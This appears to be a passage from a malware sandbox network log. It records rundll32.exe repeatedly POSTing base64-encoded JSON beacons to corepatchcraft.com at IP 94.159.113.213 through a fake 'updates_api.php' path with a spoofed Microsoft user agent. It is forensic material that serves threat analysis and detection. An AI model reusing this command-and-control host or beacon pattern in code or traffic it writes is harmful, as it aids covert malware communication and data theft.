                        19 | 192.168.2.6 | 60873 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:22 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:22 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:23 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:22 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:23 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.6 | 60880 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:24 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:24 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:24 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:24 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:24 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.2.6 | 60888 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:25 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:25 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:25 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:25 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:25 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.2.6 | 60896 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:26 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:26 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:27 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:26 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:27 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.2.6 | 60905 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:27 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:27 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:28 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:28 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:28 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.2.6 | 60911 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:29 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:29 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:29 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:29 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:29 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.2.6 | 60919 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:30 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:30 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:31 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:30 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:31 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.2.6 | 64279 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:32 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:32 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:32 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:32 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:32 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        27 | 192.168.2.6 | 64290 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:33 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:33 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:33 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:33 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:33 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        28 | 192.168.2.6 | 64299 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:34 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:34 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:35 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:35 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:35 UTC | 20 | IN
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        29 | 192.168.2.6 | 64311 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:36 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:36 UTC | 249 | OUT
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:36 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:36 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:36 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        30 | 192.168.2.6 | 64321 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:37 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:37 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:37 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:37 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        31 | 192.168.2.6 | 64331 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:38 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:39 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:39 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:39 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        32 | 192.168.2.6 | 64340 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:40 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:40 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:40 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:40 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        33 | 192.168.2.6 | 64350 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:41 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:41 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:41 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:41 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        34 | 192.168.2.6 | 64360 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:42 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:43 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:43 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:43 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        35 | 192.168.2.6 | 64371 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:44 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:44 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:44 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:44 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        36 | 192.168.2.6 | 64382 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:45 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:46 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:45 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:46 UTC | 20 | IN | Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        37 | 192.168.2.6 | 64390 | 94.159.113.213 | 443 | 2800 | C:\Windows\SysWOW64\rundll32.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2025-01-16 05:02:47 UTC | 250 | OUT | POST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:47 UTC | 217 | IN | HTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:47 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
